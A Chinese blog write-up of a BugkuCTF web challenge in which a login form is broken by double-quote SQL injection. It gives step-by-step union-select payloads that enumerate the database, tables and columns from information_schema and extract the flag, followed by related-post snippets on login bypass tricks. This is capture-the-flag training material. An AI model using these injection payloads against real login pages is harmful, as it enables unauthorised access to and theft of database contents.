BugkuCTF之web题之这是一个神奇的登陆框

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量9.9k 收藏 10
点赞数 3
分类专栏: CTF题 BUGKUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/84930265
版权
CTF题 同时被 2 个专栏收录
115 篇文章 16 订阅
订阅专栏
BUGKUCTF
11 篇文章 2 订阅
订阅专栏

BugkuCTF之web题之这是一个神奇的登陆框

打开网页之后发现:
在这里插入图片描述
随便输入账号和密码出现:
在这里插入图片描述
那就开始寻找注入点吧,输入0’发现还是:
在这里插入图片描述
输入0" 发现报错:
在这里插入图片描述
确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现:
在这里插入图片描述
说明有两列。

输入 0" union select database(),2# ,得到库名:
在这里插入图片描述
继续输入 0" union select table_name,2 from information_schema.tables where table_schema=‘bugkusql1’ # 得到表名:
在这里插入图片描述
继续输入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ # 得到列名:
在这里插入图片描述
继续输入 0" union select flag1,2 from flag1# 得到该列下的值:
在这里插入图片描述
看起来挺像flag的,那么提交一下吧,发现这个真的是flag!!!

A_dmins
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
mysql 登录注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2510
SQL注入是CTFWEB方向必不可少的一种型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
BugKu 管理员登录
qq_39585393的博客
10-16 249
接下来就是伪造个本地IP,查阅后使用burpsuit的repeater伪造。这里用到了X-Forwarded-For,简单来说这个本来是用于确定客户端的真实地址的,但是可以伪造然后相当于把消息地址修改了。
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 670
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
CTFweb篇——html源代码签到
suiyideAli的博客
09-21 6026
0x00 前言 做CTFweb中Html查看源代码的还是比较简单,对我而言,就是在源代码中找寻相关的关键字或者线索。 0x01 签到 进入靶场发现当前页面(最开始怀疑是靶场原因没进去,仔细研究后发现自己被障眼法了) 初次做的时候,在懵逼至于,点开了下一页 发现事情并不简单,于是退回,果断右键鼠标查看源代码, 暂且不考虑源代码多与少,直接 ctrl+f 查找 f...
webbug php盲注,CTF-WEB 一个登录SQL盲注
weixin_36012215的博客
03-28 197
标签下的内容 没办法 又去学习一下“美丽的汤”Beautifulsoup 解析网页首先放上一段测试代码:# -*- coding:utf-8 -*-from bs4 import BeautifulSoupimport requestssession = requests.Session()paramsPost = {"password":"1","username":"admin"}hea...
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7078
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这可能是我们为admin才可以得到flag 在login页面找到登录 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
CTFHub技能书解笔记-密码口令-默认口令
qq_43006864的博客
12-21 448
一、打开题目,是一个平平无奇的登陆界面。 其实也没啥头绪了,但是看到他页面最下方,那个北京亿中邮信息技术有限公司,好像像是优点么点意思。 我寻思百度一下。看看能不能找到默认账户和口令。好家伙,这一搜索直接再其他大佬的博客里找到了个这。 然后,我就开始本办法了。各种试,就出来了,没有任何工具,就一波社工学了,资产收集了属于是。 ...
bugkuctf-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF工具之WEB.zip
10-07
总的来说,这个“CTF工具之WEB.zip”集合了Web安全领域的一系列关键资源,涵盖了从信息收集、漏洞探测到攻击模拟和防御分析等多个环节,对于CTF参赛者或是希望提升Web安全能力的人来说,是一个极其有价值的工具库。...
BugKu 2021 CTF AWD 排位赛 真 S2 AWD排位赛-7.zip
12-07
【压缩包子文件的文件名称列表】只有一个名为"html"的文件,这通常意味着挑战与Web安全有关,特别是HTML代码的分析和理解。HTML是超文本标记语言,是构建网页的基础。在这个挑战中,参赛者可能需要审查HTML源代码,...
CTF工具之御剑后台扫描(web).rar
09-16
1. **下载安装**:首先,你需要将"CTF工具之御剑后台扫描(web)"这个压缩包解压,然后按照说明文档进行安装。 2. **配置参数**:根据目标网站的信息,设置相应的扫描参数,如URL、端口、用户名列表等。 3. **启动...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3422
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
shutTD的CTF之旅WEB篇(1)--某个DASCTF
shutTD的博客
09-26 878
某个不知道源头的DASCTF个人wp
BugkuCTF-WEBlogin1
am_03的博客
08-29 1303
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
一道简单的CTF登录
anquanniu的博客
03-06 8188
一、解感受 这道50分,在实验吧练习场算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成题目。 所以本文主要是在pc...
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
weixin_44722125的博客
05-14 2712
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or的两边要有单引号,使它变成password=‘xxx’ or 'xxx’的形式,那么可以根据32位16进制的字符串来查找‘or’对应的16进制是276f7227,所以我们的目标就是要找一个字符串取3...
ctfweb题目中的绕过登陆
weixin_42349846的博客
04-13 9312
1.后台登录 绕过登录获得FLAG cookie 登录网站的时候会产生cookie信息,通过获取cookie信息来绕过登录 用BP来获取数据包,通过删掉cookie信息来得到flag php在线执行工具:https://tool.lu/coderunner/ 2。简单的文件包含语句查询: e.g http://118.190.87.135:10080/?op=php://filter/con...
2018-2019安恒web集合(不完整版)
吃肉唐僧的博客
11-03 3452
前一段时间打安恒杯,需要集训一下之前安恒杯的题目 但是发现安恒杯赛事虽多,但是都分布得很散乱 官方没整理出一个顺序来,让人无从学起, 而且由于web很难复现,writeup都很难找, 目前,整理了一些web方向的题目, 如果觉得给出来的writeup不详细, 根据题目顺腾摸瓜去找更多解就行了 目录 2017夏季预赛 根据IP查DNS 编辑器泄露 babywaf 总...
9-杂项题目练习(六)
10-05
9-杂项题目练习(六)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值